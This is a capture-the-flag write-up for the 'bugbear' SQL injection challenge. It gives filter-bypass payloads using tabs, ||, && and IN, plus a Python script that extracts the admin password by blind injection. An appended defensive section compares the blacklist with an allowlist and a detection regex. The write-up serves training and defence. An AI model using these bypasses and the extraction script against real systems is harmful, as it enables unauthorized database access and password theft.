Source code analysis
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe");
This is very similar to the darkknight challenge, except that or, and, the space character, like and 0x are filtered on top.
Replace or with ||, and with &&, the space with %09 (tab), and like with IN, and the same approach works.
?pw=1234&no=123%09||%09id%09IN%09("admin")%09%26%26%09length(pw)%09IN%09(8)
?pw=1234&no=123%09||%09id%09IN%09("admin")%09%26%26%09left(pw,1)%09IN%09("7")
import http.client

result = ''
leng = 0
header = {'Cookie': ' '}  # session cookie goes here (left blank in the original post)
# candidate characters for the password, 76 in total
string = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"

# Step 1: find the password length with length(pw) IN (i); "Hello admin" marks a true condition
for i in range(1, 100):
    length = '/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?pw=1234&no=123%09||%09id%09IN%09("admin")%09%26%26%09length(pw)%09IN%09(' + str(i) + ')'
    conn = http.client.HTTPConnection('los.eagle-jump.org')
    conn.request('GET', length, '', header)
    data = conn.getresponse().read()
    conn.close()
    if "Hello admin" in data.decode():
        leng = i
        print("pw length: " + str(i))
        break

# Step 2: recover the password one character at a time with left(pw,i) IN ("prefix+candidate")
for i in range(1, leng + 1):
    for j in range(0, 76):
        substr = '/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?pw=1234&no=123%09||%09id%09IN%09("admin")%09%26%26%09left(pw,' + str(i) + ')%09IN%09(' + '"' + result + string[j] + '")'
        conn = http.client.HTTPConnection('los.eagle-jump.org')
        conn.request('GET', substr, '', header)
        data = conn.getresponse().read()
        conn.close()
        if 'Hello admin' in data.decode():
            result = result + string[j]
            print('left(pw,' + str(i) + ')= ' + result)
            break

print('Password is ' + result)
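As an added example (not part of this writeup or the challenge), the no-parameter blacklist from the PHP source above ported to Python, next to the positive digits-only check the challenge should have used and a log-triage regex that normalizes tabs before matching; run over constructed request lines it shows why the blacklist passes the tab/IN/|| payloads while an allowlist rejects them. The function names, INJECTION_SHAPE and the sample requests are my own.

```python
import re
from urllib.parse import urlparse, parse_qs

# The challenge's own blacklist on `no`, ported from the PHP preg_match calls
# (case-insensitive, applied to the percent-decoded value as PHP sees it in $_GET).
NO_FILTER = [
    re.compile(r'prob|_|\.|\(\)', re.I),
    re.compile(r"'|substr|ascii|=|or|and| |like|0x", re.I),
]

def blacklist_blocks(no: str) -> bool:
    """True if the original filter would reject this `no` value."""
    return any(p.search(no) for p in NO_FILTER)

def allowlist_accepts(no: str) -> bool:
    """Positive validation: `no` is a row number, so only digits are legal."""
    return re.fullmatch(r'[0-9]+', no) is not None

# Log-triage heuristic (assumed, not from the page): collapse tabs/newlines to a
# single space, then look for boolean-operator + IN(...)/= or string-function shapes.
INJECTION_SHAPE = re.compile(
    r'(\|\||&&|\bor\b|\band\b)\s*\w+\s*(in\s*\(|=)|\b(left|length|substr)\s*\(', re.I)

def detector_flags(no: str) -> bool:
    normalized = re.sub(r'\s+', ' ', no)
    return INJECTION_SHAPE.search(normalized) is not None

def inspect_request(uri: str) -> dict:
    """Decode a request URI the way the PHP side does and run all three checks."""
    no = parse_qs(urlparse(uri).query, keep_blank_values=True).get('no', [''])[0]
    return {
        'no': no,
        'blacklist_blocks': blacklist_blocks(no),
        'allowlist_accepts': allowlist_accepts(no),
        'detector_flags': detector_flags(no),
    }

# Constructed sample request lines (not captured traffic): one benign, one naive
# injection the blacklist does stop, and the two tab/IN/|| payloads from this post.
SAMPLE_REQUESTS = [
    '/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?pw=1234&no=123',
    '/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?pw=1234&no=123%20or%20id=%27admin%27',
    '/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?pw=1234&no=123%09||%09id%09IN%09("admin")%09%26%26%09length(pw)%09IN%09(8)',
    '/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?pw=1234&no=123%09||%09id%09IN%09("admin")%09%26%26%09left(pw,1)%09IN%09("7")',
]

if __name__ == '__main__':
    for uri in SAMPLE_REQUESTS:
        print(inspect_request(uri))
```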